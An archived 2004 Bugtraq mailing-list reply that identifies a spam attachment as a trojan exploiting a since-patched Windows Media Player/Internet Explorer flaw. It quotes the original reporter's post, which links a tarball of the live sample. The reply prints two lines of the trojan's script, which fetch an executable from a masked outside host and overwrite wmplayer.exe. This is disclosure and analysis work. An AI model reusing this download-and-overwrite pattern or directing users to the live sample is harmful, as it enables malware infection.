lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: 29 Jan 2004 20:00:19 -0000
From: K-OTiK Security <Special-Alerts@...tik.com>
To: bugtraq@...urityfocus.com
Subject: Re: new WIN virus?


In-Reply-To: <Pine.BSF.4.58.0401290056100.39640@...rnepu.fhfcvpvbhf.bet>

This is a lame trojan? trying to exploit the Windows Media Player/Internet Explorer vulnerability (greetz to Liu Die Yu)

x.Open("GET", "http://www.****.ru/dan/updatte.exe",0);
[...]
s.SaveToFile("C:\\Program Files\\Windows Media Player\\wmplayer.exe",2);  

Online Demo : http://www.k-otik.com/WMPLAYER-TEST/

Vulnerability fixed with MS03-048 BID (8577, 9013, 9014, 9015).

Regards.
Chaouki B. /// http://www.k-otik.com



>From: Atom 'Smasher' <atom@...picious.org>
>To: bugtraq@...urityfocus.com
>Subject: new WIN virus?
>
>-----BEGIN PGP SIGNED MESSAGE-----
>Hash: SHA1
>
>i don't know much at all about windows, but this spam got past my spam
>filter and drew my attention. i tested the suspect file in some on-line
>virus checkers, and they all reported the file as not being a threat.
>looking at the page that the spam requested (hidden after "@" in the link)
>i can only think that the file is up to no-good.
>
>the original spam, the page that it requests, and the suspicious "exe"
>file:
>	http://smasher.suspicious.org/tmp/live-virus.tgz
>
>live-virus.tgz
>md5:  42e6edfe1dcbb3e83f3da997014c7858
>sha1: 372ef9ce498b3cd23cd7c0c2b404a18f7d1b7771
>
>the TGZ contains:
>- -rw-r--r-- atom/atom      1606 Jan 29 00:34 2004 spam
>- -rw-r--r-- atom/atom      1941 Jan 29 00:31 2004 gift-with-headers.html
>- -rw-r--r-- atom/atom      8704 Jan 28 22:41 2004 updatte.exe
>
>updatte.exe was tested on:
>   yahoo-mail
>   http://www.kaspersky.com/remoteviruschk.html
>   http://www.dials.ru/english/www_av/
>   http://www.rav.ro/scan/indexn.php
>and they all reported that the file poses no threat. i suspect they're
>wrong.
>
>
> 	...atom
>

>

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ